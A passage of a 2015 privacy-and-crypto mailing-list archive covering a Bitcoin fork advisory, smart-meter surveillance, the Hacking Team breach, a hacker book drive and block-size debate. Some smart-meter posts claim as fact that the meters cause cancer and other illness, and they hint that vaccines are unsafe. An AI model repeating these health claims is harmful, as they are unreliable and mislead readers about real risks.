All software that assumes blocks are valid (because invalid blocks cost miners money) is at risk of showing transactions as confirmed when they really aren't. This particularly affects lightweight (SPV) wallets and software such as old versions of Bitcoin Core which have been downgraded to SPV-level security by the new BIP66 consensus rules.

The immediate fix, which is well underway as of this writing, is to get all miners off of SPV mining and back to full validation (at least temporarily).
As this progresses, we will reduce our current recommendation of waiting 30 extra confirmations to a lower number.
"""

From l at odewijk.nl Sat Jul 4 08:09:45 2015
From: l at odewijk.nl (Lodewijk andré de la porte)
Date: Sun, 5 Jul 2015 00:09:45 +0900
Subject: Bitcoin Book Review
In-Reply-To:
References:
Message-ID:

Rich people don't jump a sinking ship, even if it's loaded with gold/Bitcoin. The case was so obviously solved, really, who would want to associate? It's his own bloody fault for staying in the US, too! Go teach English in China for a while or something. Give'm a challenge!

From grarpamp at gmail.com Sat Jul 4 21:18:49 2015
From: grarpamp at gmail.com (grarpamp)
Date: Sun, 5 Jul 2015 00:18:49 -0400
Subject: There's this really kewl mesh network that's being deployed world-wide...
In-Reply-To:
References:
Message-ID:

On Sat, Jul 4, 2015 at 11:08 AM, Seth wrote:
> ...have you heard about it? No? Well...odds are you've already given implied
> consent for the IoT.

Film looks relevant on many levels but is long.

https://www.youtube.com/watch?v=YRjjLyVkP0o
https://www.youtube.com/results?search_query=infowars+smart+meters

"Power concedes nothing without a demand. It never did and it never will. Find out just what any people will quietly submit to and you have found out the exact measure of injustice and wrong which will be imposed upon them."
-- Frederick Douglass (1818-1895), author, former slave

The most common way people give up their power is by thinking they don't have any.

Be the change you wish to see.

From grarpamp at gmail.com Sat Jul 4 21:25:02 2015
From: grarpamp at gmail.com (grarpamp)
Date: Sun, 5 Jul 2015 00:25:02 -0400
Subject: Stop Watching Us
Message-ID:

Other video... from 2013...
https://www.youtube.com/results?search_query=stop+watching+us
https://www.youtube.com/watch?v=0cxPEf9ZWIo

Protests always generate interesting youtube chats with many people.

From list at sysfu.com Sun Jul 5 08:38:51 2015
From: list at sysfu.com (Seth)
Date: Sun, 05 Jul 2015 08:38:51 -0700
Subject: There's this really kewl mesh network that's being deployed world-wide...
In-Reply-To:
References:
Message-ID:

On Sat, 04 Jul 2015 21:18:49 -0700, grarpamp wrote:

> On Sat, Jul 4, 2015 at 11:08 AM, Seth wrote:
>> ...have you heard about it? No? Well...odds are you've already given
>> implied
>> consent for the IoT.
>
> Film looks relevant on many levels but is long.

This is true. For those that don't have the time or desire to watch, some takeaways:

The biggest takeaway is that the jig is up with the current business model of centralized power distribution. The growth of decentralized power production (home solar etc) is driving a stake into the heart of the beast.

The power company execs know this and openly admit as much. So they are changing business models to one of CENTRALIZED DATA HARVESTING AND SURVEILLANCE.

'smart meters' are a massive and global offensive thrust of the 'Internet of Things' surveillance state and control grid directly into the home. They form a mesh network on the 900Mhz band. They are supposed to have 2.4Ghz radio (not yet widely activated) for extracting surveillance data and controlling 'smart' appliances in the home.

I use the term 'smart' in quotes because it is a goddamn propaganda term and needs to be replaced in the popular culture as soon as possible with something more apt and mocking, say 'evil-genius'. I will use the term 'evil-genius' meters from now on.

Anyways, these evil-genius meters douse your house with something on the order of 40,000 microwave pulses a day. The meters are built in China, and allegedly have not had any real safety testing done on them.
The AC-DC converters used to power the evil genius brain in these devices is supposedly a crap one and generates a significant power waste along with 'dirty electricity' (that is a choppy or rough sine wave instead of smooth clean one) which radiates throughout the home via the electrical wiring.

The legal principle of 'implied consent' being used to justify the stealth installation of the meters world wide is a very shaky one. The vast majority of people that are having these meters installed on their homes by the power company are completely unaware of what is going on. It's a classic trojan horse.

It's also a contractual violation. To have a valid contract there must be an offer, consideration, and acceptance. There is none of this with the evil-genius meter roll-outs. They simply are putting them in without asking the customer for permission.

Depending on the jurisdiction, you can refuse the evil-genius meter, but then you're hit with an extortionate monthly 'meter reading' fee, which was not charged before the evil-genius meter roll-out began.

Some people in the Los Angeles area that have refused evil-genius meter installation, have been locked into months long battle with the utility company and consequently LIVING WITHOUT ELECTRICITY for months on end. Now that is some crazy shit, no matter how you slice it.

WHY are the companies so adamant about having these devices installed to the point where they're willing to cut off a resister's power for months on end, and foregoing that revenue? Perhaps to make an example out of them?

I could go on and on.

If you know anybody that sleeps in a room next to one of these devices, *especially* if they are pregnant women or young children, get them the fuck away from it as soon as possible, ideally by having the device removed and replaced with an analog one, or by changing rooms or living locations.
From shelley at misanthropia.org Sun Jul 5 10:38:14 2015 From: shelley at misanthropia.org (Shelley) Date: Sun, 05 Jul 2015 10:38:14 -0700 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: <14e5f228a40.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> References: Message-ID: <20150705173757.F005FC00290@frontend1.nyi.internal> On July 5, 2015 8:46:53 AM Seth wrote: > > This is true. For those that don't have the time or desire or watch, some > takeaways: TY for the summary. I block all things goog but suspected this was the topic; agree with your comments. Yes, because they have neglected the basic infrastructure for decades & discourage the use of individual solar/etc., some otherwise sensible people are welcoming the idea of these spy boxes - because their bullshit propaganda is designed to appeal to those of us who are concerned about the environment. Oh sure, why would I mind if "the grid" reschedules my laundry to an "off-peak" time? It'll save me money (*always* the hook, if the environmental concern-troll act fails), and I'm not home anyway, right? Oh wait, they know when I'm not home... they also know: when I wake up, which appliances I use and when, whether I have had an overnight guest, when I leave and for how long I am gone, (which they can combine with transit pass records- which some employers have integrated with electronic, RFID-polluted work IDs so there is almost no avoiding it unless you take active measures to do so, which then invites further spook scrutiny), credit card purchases and surveillance cam info (interconnected by TrapWire [0] to know where I've been & what I've been doing all day, so even if you leave your universal tracking device at home, walk/bike everywhere and pay with cash/BTC, you are still tracked-as-fuck), when I get home, what I read or watch and listen to, when I go to sleep, and with whom ... 
If your municipality hasn't yet deployed these spy boxes, do what you can to slow their roll out! Is this what you want (in addition to the very real detrimental health effects already mentioned?) I live in one of the most liberal, progressive cities around and initially they'd treated us as some conspiracy theorists when a few of us raised concerns about the unnecessary collection of data, the security of the transmission of said data & who will have access to it and the health concerns. Now they've been scheduling dog & pony show community meetings to "address our concerns," and attending one probably puts you on the same list as going to a 2600 meeting... They are supposed to begin the deployment of these spy boxes here in 2016-17 and I'll be damned if they'll put one on my abode. For being such an inconvenient troublemaker, they'll charge $50 or more per billing cycle (final amount is as yet undecided.) This is total bullshit. They can upgrade "the grid" without making it a universal spying network, but why would they when sheeple don't complain and push back? [0] https://publicintelligence.net/unravelling-trapwire/ http://www.wired.com/2012/08/trapwire-strafor-biz/ -S > The biggest takeaway is that jig is up with the current business model of > centralized power distribution. The growth of decentralized power > production (home solar etc) is driving a stake into the heart of the beast. > > The power company execs know this openly admit as much. So they are > changing business models to one of CENTRALIZED DATA HARVESTING AND > SURVEILLANCE. > > 'smart meters' are a massive and global offensive thrust of the 'Internet > of Things' surveillance state and control grid directly into the home. > They form a mesh network on the 900Mhz band. They are supposed to have > 2.4Ghz radio (not yet widely activated) for extracting surveillance data > and controlling 'smart' appliances in the home. 
> > I use the term 'smart' in quotes because it is a goddamn propaganda term > and needs to be replaced in the popular culture as soon as possible with > something more apt and mocking, say 'evil-genius'. I will use the term > 'evil-genius' meters from now on. > > Anyways, these evil-genius meters douse your house with something on the > order of 40,000 microwave pulses a day. The meters are built in China, and > allegedly have not had any real safety testing done on them. > > The AC-DC converters used to power the evil genius brain in these devices > is supposedly a crap one and generates a significant power waste along > with 'dirty electricity' (that is a choppy or rough sine wave instead of > smooth clean one) which radiates throughout the home via the electrical > wiring. > > The legal principle of 'implied consent' being used to justify the stealth > installation of the meters world wide is a very shaky one. The vast > majority of people that are having these meters installed on their homes > by the power company are complete unaware of what is going on. It's a > classic trojan horse. > > It's also a contractual violation. To have a valid contract there must be > an offer, consideration, and acceptance. There is none of this with the > evil-genius meter roll-outs. They simply are putting them in without > asking the customer for permission. > > Depending on the jurisdiction, you can refuse the evil-genius meter, but > then you're hit with an extortionate monthly 'meter reading' fee, which > was not charged before the evil-genius meter roll-out began. > > Some people in the Los Angeles area that have refused evil-genius meter > installation, have been locked into months long battle with the utility > company and consequently LIVING WITHOUT ELECTRICITY for months on end. Now > that is some crazy shit, now matter how you slice it. 
>
> WHY are the companies so adamant about having these devices installed to
> the point where they're willing to cut off a resister's power for months
> on end, and foregoing that revenue? Perhaps to make an example out of them?
>
> I could go on and on.
>
> If you know anybody that sleeps in a room next to one of these devices,
> *especially* if they are pregnant women or young children, get them the
> fuck away from it as soon as possible, ideally by having the device
> removed and replaced with an analog one, or by changing rooms or living
> locations.

From list at sysfu.com Sun Jul 5 15:24:59 2015
From: list at sysfu.com (Seth)
Date: Sun, 05 Jul 2015 15:24:59 -0700
Subject: There's this really kewl mesh network that's being deployed world-wide...
In-Reply-To:
References:
Message-ID:

On Sun, 05 Jul 2015 10:04:09 -0700, Sean Lynch wrote:

> LOL. If you don't work for the NSA, they probably love you for getting
> people to focus on harmless (and pointless, and overpriced) smart meters
> instead of the real, extremely harmful mass surveillance that's
> happening.
>
> The power output from these things is substantially lower than a
> cellphone
> or wifi device due to their low data rates, hence the need to mesh.

Cancer LOL. Lymphoma LOL Brain tumors LOL. Leukemia ROFL.

Cell phones are so safe, the 500 Billion dollar a year industry needed to obtain special legal protection absolving them of any liability in a 1998 U.S. Telecommunications bill rider.

Companies need special legislation drafted and passed that absolves them of all legal liability **only** when the products they are selling are completely safe and harmless, everybody got that?

Just like the vaccine industry was granted immunity from legal liability in the United States in 1986. Because their products are so safe.
Those of you that are interested in a fact based breakdown on the risk of RF exposure from evil-genius meters should watch this 2010 presentation to the San Francisco Tesla Society by consulting engineer Rob States:

https://www.youtube.com/watch?v=FLeCTaSG2-U

If there's any silver lining to the deadly health impacts of these devices it's the golden opportunity dropped into the lap of privacy and freedom loving people to leverage opposition to health threat to simultaneously drive out the privacy and data-enslavement threats.

From seanl at literati.org Sun Jul 5 10:04:09 2015
From: seanl at literati.org (Sean Lynch)
Date: Sun, 05 Jul 2015 17:04:09 +0000
Subject: There's this really kewl mesh network that's being deployed world-wide...
In-Reply-To:
References:
Message-ID:

On Sat, Jul 4, 2015, 08:13 Seth wrote:

...have you heard about it? No? Well...odds are you've already given implied consent for the IoT.

https://www.youtube.com/watch?v=0hJqs1jwAPc

LOL. If you don't work for the NSA, they probably love you for getting people to focus on harmless (and pointless, and overpriced) smart meters instead of the real, extremely harmful mass surveillance that's happening.

The power output from these things is substantially lower than a cellphone or wifi device due to their low data rates, hence the need to mesh.

From tom at ritter.vg Sun Jul 5 15:44:21 2015
From: tom at ritter.vg (Tom Ritter)
Date: Sun, 5 Jul 2015 17:44:21 -0500
Subject: progression of technologies
In-Reply-To: <20150625032613.48665228148@palinka.tinho.net>
References: <20150625032613.48665228148@palinka.tinho.net>
Message-ID:

On 24 June 2015 at 22:26, wrote:
> Paraphrasing Bonnie Raitt, let's give 'em something germane
> to argue about.
In particular, what do I have wrong here: > > http://www.csmonitor.com/World/Passcode/Passcode-Voices/2015/0617/Opinion-The-reasonable-expectation-fallacy I'm far from certain, but I think what you have wrong is the notion that wavelength doesn't matter. I think the courts have decided it does: https://en.wikipedia.org/wiki/Joffe_v._Google,_Inc.#U.S._Supreme_Court Specifically, "most of the general public lacks the expertise to intercept and decode payload data transmitted over a Wi-Fi network." Therefore the notion that you can point whatever sort of 'camera' you want at people to capture them isn't accurate. (The other relevant case is that the police do need a warrant to point infrared cameras at people's houses.) -tom From list at sysfu.com Sun Jul 5 17:56:01 2015 From: list at sysfu.com (Seth) Date: Sun, 05 Jul 2015 17:56:01 -0700 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: <20150705173757.F005FC00290@frontend1.nyi.internal> References: <20150705173757.F005FC00290@frontend1.nyi.internal> Message-ID: On Sun, 05 Jul 2015 10:38:14 -0700, Shelley wrote: > TY for the summary. I block all things goog but suspected this was the > topic; agree with your comments. Glad someone found it helpful. I've actually been meaning to post more viewing notes along with interesting videos that I think are worth sharing, with the aim of being more respectful of people's time. Still working on the discipline to take notes while viewing. It's a bit like disciplining yourself to take pictures when you're traveling. There's always a feeling of "oh man, this is a hassle and I just want to enjoy the moment without fussing with a camera." But you're always glad you took pictures later on. Regarding blocking of all things goog: Until I get my own MediaGoblin instance up and running I can try repost videos on a service that's a tad less an arm of the surveillance state. 
I was thinking of inserting the content into the new Alexandria project. If you have any other suggestions let me know.

> Yes, because they have neglected the basic infrastructure for decades &
> discourage the use of individual solar/etc., some otherwise sensible
> people are welcoming the idea of these spy boxes - because their
> bullshit propaganda is designed to appeal to those of us who are
> concerned about the environment.
>
> Oh sure, why would I mind if "the grid" reschedules my laundry to an
> "off-peak" time? It'll save me money (*always* the hook, if the
> environmental concern-troll act fails), and I'm not home anyway, right?

Electricity is a unique commodity in that it's not that efficient to store, so I can see the logic in trying to shift usage to off peak times. The engineer Rob States from the other follow-up vid I posted says that utilities could save 30% on power transmission by switching to superconductor high tension lines.

> Oh wait, they know when I'm not home...
>
> they also know:
> when I wake up,
> which appliances I use and when,
> whether I have had an overnight guest,
> when I leave and for how long I am gone, (which they can combine with
> transit pass records- which some employers have integrated with
> electronic, RFID-polluted work IDs so there is almost no avoiding it
> unless you take active measures to do so, which then invites further
> spook scrutiny),
> credit card purchases and surveillance cam info (interconnected by
> TrapWire [0] to know where I've been & what I've been doing all day, so
> even if you leave your universal tracking device at home, walk/bike
> everywhere and pay with cash/BTC, you are still tracked-as-fuck),
> when I get home,
> what I read or watch and listen to,
> when I go to sleep, and with whom ...
>
> If your municipality hasn't yet deployed these spy boxes, do what you
> can to slow their roll out! Is this what you want (in addition to the
> very real detrimental health effects already mentioned?)
>
> I live in one of the most liberal, progressive cities around and
> initially they'd treated us as some conspiracy theorists when a few of
> us raised concerns about the unnecessary collection of data, the
> security of the transmission of said data & who will have access to it
> and the health concerns. Now they've been scheduling dog & pony show
> community meetings to "address our concerns," and attending one probably
> puts you on the same list as going to a 2600 meeting...

Agree with all this. If you can grow a beard, start farming it! haha.

> They are supposed to begin the deployment of these spy boxes here in
> 2016-17 and I'll be damned if they'll put one on my abode.

Time to start whipping up some suspicion and discontent with the peasants beforehand, I'd say. I would like to live in a culture of resistance where the prevalent mindset is always "Hmm, big mega corp 'X' or gov is trying to roll out such and such product/service/program/legislation. How are they trying to fuck us in the ass this time?"

> For being such an inconvenient troublemaker, they'll charge $50 or more
> per billing cycle (final amount is as yet undecided.)

$50 a billing cycle is outrageous. Depending on the laws where you live, you might be best served by communicating your refusal via registered mail or whatever the equivalent is in your area. Takebackyourpower.net has lots of resources for how to properly serve the electrical company with a refusal notice so that you will maintain the best legal position to dispute the extortion charges they try to punish you with.

> This is total bullshit. They can upgrade "the grid" without making it a
> universal spying network, but why would they when sheeple don't complain
> and push back?

I think there's a lot of push-back happening, we're on the cusp and it's gaining momentum every day.
three people on my street have already gone back to analogue a long time ago, and I'm approaching three more neighbors with the hopes of convincing them to do the same. I might even be going door to door and distributing copies of the 'Take Back your Power' documentary. From coderman at gmail.com Sun Jul 5 18:18:17 2015 From: coderman at gmail.com (coderman) Date: Sun, 5 Jul 2015 18:18:17 -0700 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: References: <20150705173757.F005FC00290@frontend1.nyi.internal> Message-ID: On 7/5/15, Seth wrote: > ... > Glad someone found it helpful. I've actually been meaning to post more > viewing notes along with interesting videos that I think are worth > sharing, with the aim of being more respectful of people's time. abridged & annotated selections would be quite useful! perhaps a way to coordinate efforts (thinking of CCC dead trees, too) looking over just CCC and DEF CON archives, it is months to cull... > Electricity is a unique commodity in that it's not that efficient to > store, so I can see the logit in trying to shift usage to off peak times. private storage - excluding cost, pair of 8 x tesla home storage on each side of garage - even active household could just "top off" every other day on grid. power co sees transient peak loads conveying no information about household activity other than aggregate daily consumption. eventually you'll transition to all decentralized renewable generation? 
now if only we could steadily improve earth humans, like we improve technology :)

best regards,

From mirimir at riseup.net Sun Jul 5 20:53:25 2015
From: mirimir at riseup.net (Mirimir)
Date: Sun, 05 Jul 2015 21:53:25 -0600
Subject: Hacking Team has been hacked (hard)
In-Reply-To: <5599F683.40200@gna.org>
References: <5599F683.40200@gna.org>
Message-ID: <5599FBB5.402@riseup.net>

On 07/05/2015 09:31 PM, Christian Gagneraud wrote:
> As nobody has reported it yet, here we go:
> https://twitter.com/hackingteam

https://news.ycombinator.com/item?id=9836336

From moritz at headstrong.de Sun Jul 5 14:45:34 2015
From: moritz at headstrong.de (Moritz)
Date: Sun, 05 Jul 2015 23:45:34 +0200
Subject: Dead Tree Lovers -- Call for Books
Message-ID: <5599A57E.9020808@headstrong.de>

DEAD TREE LOVERS -- CALL FOR BOOKS

[ASCII-art banner of bookshelves]

tl;dr: We want your books. Send them to us.
In December 2014, over 500 books were brought to Chaos Communication Congress in Hamburg for an experiment: During the busy days of Congress, with over 12.000 visitors, how will people react to a library of dead trees? In partnership with La Quadrature Du Thé and the Congress team, a cozy reading area was set up on the fourth floor. For us Dead Tree Lovers, to see all seats and carpet space occupied almost 24/7 by interested readers filled us with delight. The library lives on! And has considerably grown since. The database now contains over 666 titles. As a travelling library, we will bring it to places near you, to hacker events and hackerspaces, to other public spaces. It is currently hosted and accessible around the clock at OpenLab Augsburg, Germany, for free borrowing or cheap purchase, replacing existing books by other used copies. The database is limited in that it does not yet contain all of the historical material that we have so far collected on the earlier days of hacking, pre-80s. Thanks to Werner Pieper, a friend of Wau Holland and publisher, we have started to add rare material from the good old times when hacking was part of the broader political counterculture movement and not yet mainstream. Thanks to the CCC, we are now hosting a complete paper archive of the Chaos Computer Club publication 'Die Datenschleuder'. The Humanistische Union (HU) donated most (all?) of their publications. WE WANT MORE. The library needs your help. Please send us your books and reading suggestions for us to hunt down paper copies! Or better yet, send us offers first. We're open for anything tech, political, scifi, as long as you feel it influenced your life profoundly and is worth reading. The focus is hacker culture and its history in the broader sense. It is not necessary to give your books away forever, we can log the source and return it if and when you want it back. Dead Tree Lovers c/o OpenLab Augsburg e.V. Elisenstrasse 1 D-86159 Augsburg, Germany JOIN! 
We have started a mailing list to discuss all kinds of book matters: book scanning, library software (or lack thereof), book recommendations etc.

the DTL team // July 2015

---------------------------------------------------------
irc.hackint.org #deadtreelovers
https://wiki.hackerspaces.org/Dead_Tree_Lovers
https://www.librarything.com/catalog/hacklib
https://lists.hackerspaces.org/mailman/listinfo/deadtreelovers
rss: https://www.librarything.com/rss/recent/hacklib
twitter: https://twitter.com/hacklibrary

From griffin at cryptolab.net Sun Jul 5 21:16:47 2015
From: griffin at cryptolab.net (Griffin Boyce)
Date: Mon, 06 Jul 2015 00:16:47 -0400
Subject: Hacking Team has been hacked (hard)
In-Reply-To: <5599FBB5.402@riseup.net>
References: <5599F683.40200@gna.org> <5599FBB5.402@riseup.net>
Message-ID: <7a51599a75afd16669ae66aee50235ac@cryptolab.net>

Mirimir wrote:
> Christian Gagneraud wrote:
>> As nobody has reported it yet, here we go:
>> https://twitter.com/hackingteam
>
> https://news.ycombinator.com/item?id=9836336

Good; fuck 'em. Couldn't have happened to a better group of assholes.

On a technical note, there seem to be an abundance of Thumbs.db files among their leaked documents. Another one for the "what were they thinking?" file.

~Griffin

From juan.g71 at gmail.com Sun Jul 5 22:34:58 2015
From: juan.g71 at gmail.com (Juan)
Date: Mon, 6 Jul 2015 02:34:58 -0300
Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork
In-Reply-To: <5599DC34.1060006@echeque.com>
References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> <5599DC34.1060006@echeque.com>
Message-ID: <559a137b.1928370a.3f973.ffffde4a@mx.google.com>

On Mon, 06 Jul 2015 11:39:00 +1000 "James A.
Donald" wrote: > > Way back in the beginning I said an ever growing block chain would > cause unacceptable costs and inconvenience, and lo and behold, it is > causing substantial and ever growing costs and inconvenience. > But look at the bright side! Every single transaction gets recorded and stored, until jesus destroys the universe (it's in the bible). What else can privacy advocates wish for? > Of course, restraining the block chain to manageable growth without > losing other good characteristics is inherently hard, and it was a > lot easier for me to point at the problem than to fix it. > > > From seanl at literati.org Sun Jul 5 19:52:47 2015 From: seanl at literati.org (Sean Lynch) Date: Mon, 06 Jul 2015 02:52:47 +0000 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: <5599DC34.1060006@echeque.com> References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> <5599DC34.1060006@echeque.com> Message-ID: On Sun, Jul 5, 2015, 18:44 James A. Donald wrote: Way back in the beginning I said an ever growing block chain would cause unacceptable costs and inconvenience, and lo and behold, it is causing substantial and ever growing costs and inconvenience. Of course, restraining the block chain to manageable growth without losing other good characteristics is inherently hard, and it was a lot easier for me to point at the problem than to fix it. I had been hoping that we would see more stuff happening off-blockchain by now, with Bitcoin acting more as a clearing house between smaller payment providers, but all the regulations protecting the big banks from competition make it really hard to do anything off-blockchain that looks even remotely like a payments service. 
Side chains of some kind seem like a reasonable approach, and I'm guessing that it will be the difficulty of dealing with the "central" block chain that will finally force people "over the hump" into using some kind of sidechain payments system. I really want to see micropayments, for example, and those seem to be too unwieldy and expensive to do on the main chain. From juan.g71 at gmail.com Sun Jul 5 23:45:15 2015 From: juan.g71 at gmail.com (Juan) Date: Mon, 6 Jul 2015 03:45:15 -0300 Subject: Hacking Team has been hacked (hard) In-Reply-To: <7a51599a75afd16669ae66aee50235ac@cryptolab.net> References: <5599F683.40200@gna.org> <5599FBB5.402@riseup.net> <7a51599a75afd16669ae66aee50235ac@cryptolab.net> Message-ID: <559a23ee.06d98c0a.540f9.7bfc@mx.google.com> "Hacking Team hit by breach; leak suggests it sold spyware to oppressive regimes" Oh my god. Allegedly the sold stuff to the WRONG nazis. That's really terrible. From juan.g71 at gmail.com Sun Jul 5 23:55:55 2015 From: juan.g71 at gmail.com (Juan) Date: Mon, 6 Jul 2015 03:55:55 -0300 Subject: Hacking Team has been hacked (hard) In-Reply-To: <7a51599a75afd16669ae66aee50235ac@cryptolab.net> References: <5599F683.40200@gna.org> <5599FBB5.402@riseup.net> <7a51599a75afd16669ae66aee50235ac@cryptolab.net> Message-ID: <559a2670.88da8c0a.a23b.ffffe2a2@mx.google.com> they* From l at odewijk.nl Sun Jul 5 12:06:36 2015 From: l at odewijk.nl (Lodewijk andré de la porte) Date: Mon, 6 Jul 2015 04:06:36 +0900 Subject: speaking of Bitcoin ... the july4th split In-Reply-To: References: Message-ID: Half the net is SPV... MINING??? They got what they had coming, though. Very strange to not spend a tease on full validation :s Maybe they hope to save some time and start mining that new block earlier? Seems they lost quite a bit more than they might've ever saved now.
From jamesd at echeque.com Sun Jul 5 18:39:00 2015 From: jamesd at echeque.com (James A. Donald) Date: Mon, 06 Jul 2015 11:39:00 +1000 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> Message-ID: <5599DC34.1060006@echeque.com> On 2015-07-03 09:24, Lodewijk andré de la porte wrote: > It's pretty annoying to have an even bigger blockchain, don't get me > wrong on that, but that's just the way Bitcoin works: a blockchain that > grows with use. There's no reason for it to truly upset you, either. > Running a full node is already something you don't do for no reason at > all. I can't really make this argument as well as I like. The point is > that if you have a reason you would still do it later, and if you don't > you don't already. Some people noted that the pruning makes it possible > to run a full node on their phones. Cool! But there's no reason to. In > fact, you won't because it'd drain your battery. We'll be okay without > the one silly geek that does it anyway. > > So.. these points were already hard to argue against clearly. Then > there's "we can scale externally".... The trouble is that there's so > many ways, like pinning (sidechains/mastercoin), exclusively > inter-institutional settlement, debt based moneys ("the bearer of this > token is entitled to..."), and all of them could work! In fact, we could > just abandon Bitcoin altogether! And that's the core of my > counterargument: we don't have to cripple Bitcoin, so let's not. Let's > not make it more complicated than it has to be. If we do scale > externally, let it be for exceedingly good reasons and at exceedingly > competitive prices.
Way back in the beginning I said an ever growing block chain would cause unacceptable costs and inconvenience, and lo and behold, it is causing substantial and ever growing costs and inconvenience. Of course, restraining the block chain to manageable growth without losing other good characteristics is inherently hard, and it was a lot easier for me to point at the problem than to fix it. From Rayzer at riseup.net Mon Jul 6 11:59:44 2015 From: Rayzer at riseup.net (Razer) Date: Mon, 06 Jul 2015 11:59:44 -0700 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: References: Message-ID: <559AD020.4020302@riseup.net> On 07/05/2015 03:24 PM, Seth wrote: > the 500 Billion dollar a year industry needed to obtain special legal > protection absolving them of any liability in a 1998 U.S. > Telecommunications bill rider. Don't know, or believe, there were any medically related issues addressed by that rider, albeit the Finns were studying cell phone radiation early on, but rider to the bill gave them common carrier status to legally prohibit people with scanners from monitoring what at the time were mostly (if not all) analog radio transmissions. Early users of cellies, much like now, weren't technically literate enough to realize that the sex talk they were making with their GF on the side (or that business deal) was 'in the clear' for anyone to hear, and when they began to find out, the cell phone industry trembled, and lobbied congress for common carrier protection from eavesdropping. From guninski at guninski.com Mon Jul 6 05:02:31 2015 From: guninski at guninski.com (Georgi Guninski) Date: Mon, 6 Jul 2015 15:02:31 +0300 Subject: Will Greece goo boom?
In-Reply-To: <20150602165938.GB2900@sivokote.iziade.m$> References: <20150602165938.GB2900@sivokote.iziade.m$> Message-ID: <20150706120231.GA2500@sivokote.iziade.m$> On Tue, Jun 02, 2015 at 07:59:38PM +0300, Georgi Guninski wrote: > Will Greece go boom relatively soon? > http://www.cnbc.com/id/102810291 ==== European Parliament President Martin Schulz addressed the results of the Greek referendum on Sunday evening. He said Greek Finance Minister Yanis Varoufakis's promises that banks would re-open in a day or two "very difficult and dangerous" and said Europe needed to urgently discuss humanitarian aid for Greece. ==== From grarpamp at gmail.com Mon Jul 6 12:30:17 2015 From: grarpamp at gmail.com (grarpamp) Date: Mon, 6 Jul 2015 15:30:17 -0400 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: References: <20150705173757.F005FC00290@frontend1.nyi.internal> Message-ID: Depending on who owns the meter and the box it plugs into and what the contract says... don't remove it, build a faraday cage around it. From chgans at gna.org Sun Jul 5 20:31:15 2015 From: chgans at gna.org (Christian Gagneraud) Date: Mon, 06 Jul 2015 15:31:15 +1200 Subject: Hacking Team has been hacked (hard) Message-ID: <5599F683.40200@gna.org> As nobody has reported it yet, here we go: https://twitter.com/hackingteam From john at johnlgrubbs.net Mon Jul 6 08:34:24 2015 From: john at johnlgrubbs.net (John) Date: Mon, 06 Jul 2015 15:34:24 +0000 Subject: Hacking Team has been hacked (hard) In-Reply-To: <559a2670.88da8c0a.a23b.ffffe2a2@mx.google.com> References: <5599F683.40200@gna.org> <5599FBB5.402@riseup.net> <7a51599a75afd16669ae66aee50235ac@cryptolab.net> <559a2670.88da8c0a.a23b.ffffe2a2@mx.google.com> Message-ID: <81D51CC0-EA66-4E9F-957C-C5041BCE1FED@johnlgrubbs.net> Be sure to check out the github repo hackedteam. Their RCS app had the ability to plant evidence, not just gather, notably childporn. This blows parallel construction out of the water.
On July 6, 2015 1:55:55 AM CDT, Juan wrote: >they* -- Sent from my Android device with K-9 Mail. Please excuse my brevity. From admin at pilobilus.net Mon Jul 6 13:56:58 2015 From: admin at pilobilus.net (Steve Kinney) Date: Mon, 06 Jul 2015 16:56:58 -0400 Subject: There's this really kewl mesh network that's being deployed world-wide... In-Reply-To: References: <20150705173757.F005FC00290@frontend1.nyi.internal> Message-ID: <559AEB9A.2000509@pilobilus.net> On 07/06/2015 03:30 PM, grarpamp wrote: > Depending on who owns the meter and the box it plugs into and > what the contract says... don't remove it, build a faraday > cage around it. Check the specs on the thing before trusting a cage - utility companies have been sending C&C signals over power lines forever. I had a PC sound system amp that could pick some of that up as occasional little zap-zap-zap-zap bursts of compressed TTY noise. The house had some kind of power management gear hooked up to the meter, putting a UPS on the line stopped the noise, QED. (More or less, didn't have an o-scope so I can't prove nothing.)
:D From seanl at literati.org Mon Jul 6 10:04:56 2015 From: seanl at literati.org (Sean Lynch) Date: Mon, 06 Jul 2015 17:04:56 +0000 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: <559a137b.1928370a.3f973.ffffde4a@mx.google.com> References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> <5599DC34.1060006@echeque.com> <559a137b.1928370a.3f973.ffffde4a@mx.google.com> Message-ID: On Sun, Jul 5, 2015 at 10:41 PM Juan wrote: > On Mon, 06 Jul 2015 11:39:00 +1000 > "James A. Donald" wrote: > > > > > > Way back in the beginning I said an ever growing block chain would > > cause unacceptable costs and inconvenience, and lo and behold, it is > > causing substantial and ever growing costs and inconvenience. > > > > But look at the bright side! Every single transaction gets > recorded and stored, until jesus destroys the universe (it's in > the bible). What else can privacy advocates wish for? > > Transparency is also useful, and privacy can be built on top of it through the use of, say, Chaumian e-cash backed by a blockchain-based cryptocurrency.
